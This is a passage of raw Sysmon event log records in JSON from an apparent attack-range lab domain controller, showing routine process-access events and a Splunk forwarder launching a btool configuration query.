05:46:47.375","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","SourceProcessId":"1144","SourceThreadId":"2204","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-001095B80200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+264a1|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2669f|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+25c4b|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+27476|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+27db2|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+277c9|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26100|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1792,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.375\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nSourceProcessId: 1144\r\nSourceThreadId: 2204\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-001095B80200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+5a1b8|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+35a49|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2807f|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+29591|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+292c2|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26165|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.375","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","SourceProcessId":"1144","SourceThreadId":"2204","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-001095B80200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+5a1b8|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+35a49|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2807f|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+29591|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+292c2|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26165|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1793,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.375\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nSourceProcessId: 1144\r\nSourceThreadId: 2204\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-001095B80200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2597b|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+283dc|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+281af|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2982c|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+292fb|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26165|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.375","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","SourceProcessId":"1144","SourceThreadId":"2204","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-001095B80200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2597b|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+283dc|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+281af|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2982c|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+292fb|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26165|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1794,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.375\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nSourceProcessId: 1144\r\nSourceThreadId: 2204\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-001095B80200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2a2f2|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+29e26|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+28432|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+281af|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2982c|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+292fb|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26165|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.375","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","SourceProcessId":"1144","SourceThreadId":"2204","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-001095B80200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2a2f2|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+29e26|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+28432|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+281af|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2982c|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+292fb|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+26165|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1795,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.375\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nSourceProcessId: 1144\r\nSourceThreadId: 2204\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-001095B80200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+25d35|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2619d|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.375","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","SourceProcessId":"1144","SourceThreadId":"2204","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-001095B80200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+25d35|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2619d|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1796,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.391\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nSourceProcessId: 1144\r\nSourceThreadId: 2204\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-001095B80200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x100000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+261b7|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.391","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","SourceProcessId":"1144","SourceThreadId":"2204","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-001095B80200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x100000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+261b7|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1797,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.396\r\nProcessGuid: {A837DB8D-01C7-5F25-0000-0010A1B50300}\r\nProcessId: 8\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list kvstore --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {A837DB8D-01C6-5F25-0000-001081680300}\r\nParentProcessId: 3820\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal_extra_splunkd_service_args","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.396","ProcessGuid":"{A837DB8D-01C7-5F25-0000-0010A1B50300}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list kvstore --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{A837DB8D-01C6-5F25-0000-001081680300}","ParentProcessId":"3820","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal_extra_splunkd_service_args","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1798,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.391\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-001081680300}\r\nSourceProcessId: 3820\r\nSourceThreadId: 3824\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {A837DB8D-01C7-5F25-0000-0010A1B50300}\r\nTargetProcessId: 8\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+14ab4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+d1d8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.391","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-001081680300}","SourceProcessId":"3820","SourceThreadId":"3824","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{A837DB8D-01C7-5F25-0000-0010A1B50300}","TargetProcessId":"8","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+14ab4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+d1d8|C:\\Program 